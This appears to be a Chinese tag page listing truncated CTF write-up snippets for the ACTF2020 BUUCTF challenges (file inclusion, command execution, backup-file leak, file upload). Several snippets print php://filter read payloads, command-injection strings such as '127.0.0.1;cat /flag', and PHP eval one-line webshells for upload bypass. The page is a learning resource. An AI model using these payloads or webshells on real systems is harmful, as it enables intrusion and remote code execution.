首页 > TAG信息列表 > ACTF2020

[ACTF2020 新生赛]Include 1

进入靶场: 根据题目提示的include,想到使用php://filter读取文件 读取文件payload: # 明文读取index.php?file1=php://filter/resource=file.txt# 编码读取index.php?file1=php://filter/read=convert.base64-encode/resource=file.txt 构造payload: http://c4edc9e2-34ec-48a3-86

buuctf-ACTF2020新生赛-oruga(2)

buuctf-ACTF2020新生赛-oruga(2) 书接上文 一开始打算爆破它,不过好像有点难 于是重新回到题,首先它是一个迷宫题,因此我们要先找到的是起点 终点 方向 因此33是它的终点 //当v2这个下标走到33的时候 一切就结束了 其次我们 是用来判断是否超出的 符合这个循环只有左上角 再者如果起点

buuctf-ACTF2020新生赛-oruga

buuctf-ACTF2020新生赛-oruga 太晚了,已经困了,过后再写脚本 本以为这是个常规(指排好顺序就能出的题) 没想到不仔细看还真难看出来 伪代码流程图 在能顺利通过前面几个条件判断条件下,再通过while(!unk_55A6FF765020),所以我一条条看下来发现每次只有当特定字符输入时,你才能够完成这两份

BUUCTF刷题-[ACTF2020 新生赛]BackupFile-1

[ACTF2020 新生赛]BackupFile-1   1、通过dirsearch进行扫描,在扫描结果中发现了index.php.bak文件,(经过了几次尝试,才确定是这个文件,因为扫描出来的结果比较多),扫描结果如下:      2、下载扫描的index.php.bak文件,查看文件信息,文件内容如下:        3、这里说明一下intval函

[ACTF2020 新生赛]Include

1、打开靶机,点击tips获取帮助 2、发现无明显变化 3、可发现是文件包含,已经明确给出,文件包含直接读取的是文件,而不是文件源码,所以要想办法读取源码方法。那么就要涉及到 PHP 伪协议,这个是之前接触很少的东西,先了解一下PHP伪协议   五种常见的php伪协议_浪_zi的博客-CSDN博客_php

Buuctf-Web-[ACTF2020 新生赛]Include

前言 刷题网址:https://buuoj.cn/challenges#[ACTF2020 新生赛]Include 首先打开网页,提示tips点击他,根据题目提示很难不想到是文件包含,但是提示是能找到外面的flag吗,如下图。 这里我猜想的是否在上上一个目录,../上一个目录,但是无论我输多少都不行。 所以这里我转换思路尝试去读

BUUCTF-[ACTF2020 新生赛]Exec 1

BUUCTF-[ACTF2020 新生赛]Exec 1 wp 打开之后 看来是一道命令注入的题啊,打开f12看看有没有惊喜? 看了,没有 输入127.0.0.1 发现是post请求 这种题,就是看看它过滤了什么,然后构造payload 输入127.0.0.1&ls 输入127.0.0.1&ls / 看根目录 输入127.0.0.1&cat /flag

[ACTF2020 新生赛]Include

[ACTF2020 新生赛]Include 首先简单测试一下题目 0x00 进入题目根据Tip进入正题,可以看到URL中存在文件包含,而且这个题目的名字也就是文件包含 正文部分只有一行Can you find out the flag? 0x01 首先考虑 "php://input"伪协议 + POST发送PHP代码 的套路 回显如下 0x02 重新考虑之

[ACTF2020 新生赛]Upload

目录[ACTF2020 新生赛]Upload首先简单测试一下题目0x000x010x020x03!0x04 [ACTF2020 新生赛]Upload 首先简单测试一下题目 0x00 首先打开题目环境 首先题目的名字就是Upload应该是一道文件上传的题目 开始界面如下 可以发下中间灰色的灯泡是可以点亮的 然后就看到了上传点 0x01

[ACTF2020 新生赛]Include

界面有个tips,点击后就来到了?file=flag.php,写着can you find the flag 直接尝试利用php://filter伪协议进行文件包含 构造?file=php://filter/convert.base64-encode/resource=flag.php 这句话的意思是我们用base64编码的方式来读文件flag.php;这时页面会显示出源文件flag.php经过

actf2020 exec

actf2020 exec 1.根据提示,ping一个127.0.0.1,有回显,ls一下发现index.php 3.方向找错了,绕了一大圈,还cat了index.php也没发现什么 最后没招了,回原来的地方cat一下/flag,蒙对了 127.0.0.1;cat /flag   (后面想了一下,应该先”ls /“查看一下目录,目录里找到flag,再cat /flag就可以了。(!

[ACTF2020 新生赛]BackupFile_WriteUp

打开网站 找到源文件index.php.bak 代码审计 <?php include_once "flag.php"; if(isset($_GET['key'])) { // 传递参数key $key = $_GET['key']; if(!is_numeric($key)) { //key只能是数字 exit("Just num!"); } $key = intva

[ACTF2020 新生赛]Exec

打开网站 考点:RCE

[ACTF2020 新生赛]Include1

我是小白, 写给自己用来复习用。      源代码与抓包没什么可用的消息‘ 注意到payload为?file=flag.php 猜测为文件包含的题目尝试使用伪协议构造payload ?file=php://filter/read=convert.base64-encode/resource=flag.php   解释一下这里的操作,read是读的意思,另外还有wr

五、[ACTF2020 新生赛]Include

1.打开题目 点击 tips,跳转-> 文件包含,想办法得到文件源码。 2.题目分析 用到PHP伪协议 payload: http://364c5e69-6889-4c41-a16a-29a949f51006.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php 3.获取flag Base-64解码

BUU[ACTF2020 新生赛]BackupFile

backup文件也叫系统备份文件,它的做作用是:拷贝到存储介质上的文件,可以帮助保护数据,以防其在系统硬件或存储介质出现故障时受到破坏。 那么搜索一下备份文件后缀名,如果网站存在备份文件,常见的备份文件后缀名有:“.git” 、“.svn”、“ .swp”“.~”、“.bak”、“.bash_history”

BUUCTF [ACTF2020 新生赛]BackupFile

BackupFile,打开网页啥也没有,用dirsearch扫描目录 常见的备份文件后缀名有 .git .svn .swp .~ .bak .bash_history 得到一个这个文件 访问 下载下来得到 <?php include_once "flag.php"; if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) {

[ACTF2020 新生赛]Upload Buuctf

文章目录 一、检查源代码二、文件上传1、先尝试图片是否能够上传2、burpsuit抓包、改包3、使用antsword进行连接,获取flag 一、检查源代码 拿到题目之后,我们首先对页面源代码就行检查,源代码查看之后并没有发现提示或者有用线索,所以我们只能回到文件上传中找答案。 二、

[ACTF2020 新生赛]Include、[ACTF2020 新生赛]Upload 1、[极客大挑战 2019]BabySQL、[ACTF 2020新生赛]Exec、[极客大挑战 2019]Have

1.   [ACTF2020 新生赛]Include 访问题中的连接,进入页面              点击tips,跳转到下一个页面      已知题目是文件包含类型,当前页面URL存在包含语句file=flag.php所以存在文件包含漏洞 利用php://filter/read=convert.base64-encode/resource=xxx.php读源码 构

[ACTF2020 新生赛]Upload 1

1.发现 1.1文件上传漏洞常规思路 1.2构造一句话木马 <?php @eval($_POST['666']);?>  1.3上传一句话木马,发现前端:JS检验文件后缀–白名单机制:   1.4顺势而为,顺藤摸瓜搞清后台: ==》 老套路,前端上传1.jpg==》burp抓包 ==》 success,查看返回值、 发现后端:上传后以HTML页面展示,

[ACTF2020 新生赛]Include

01题目题解 打开链接 点击tips url中含有?file=flag.php,题目提示include,猜测存在文件包含漏洞 利用伪协议php://filter查看文件源码 构造/?file=php://filter/resource=flag.php发现没有反应 构造/?file=php://filter/read=convert.base64-encode/resource=flag.php得到一堆字

web buuctf [ACTF2020 新生赛]Include1

1.线索:查看tips页面源代码,只有一个标签传参链接?file=flag.php;              点击查看传参后几面源代码,网页上只有“Can you find out the flag?”一句话 2.分析:没有sql注入点              提示can you find out the flag,且传递的file是flag.php   

[ACTF2020 新生赛]BackupFile

根据提示,考虑为源码泄露 掏出 dirsearch扫     扫到.bak备份文件 <?php include_once "flag.php"; if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just num!"); } $key = intval($key);

buuctf-web-[ACTF2020 新生赛]BackupFile-wp

[ACTF2020 新生赛]BackupFile 知识点 备份文件泄露php中的弱类型比较 过程 使用扫描软件扫一下目录,扫到/index.php.bak <?php include_once "flag.php"; if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just num!&quo

buu [ACTF2020 新生赛]Upload

构造test.php(一句话木马),内容如下 GIF89a<script language="php">eval($_POST['shell']);</script> 抓包上传,将文件后缀改为phtml,上传成功,并且返回了相应的文件名称 再用中国蚁剑链接,查找目录 可得flag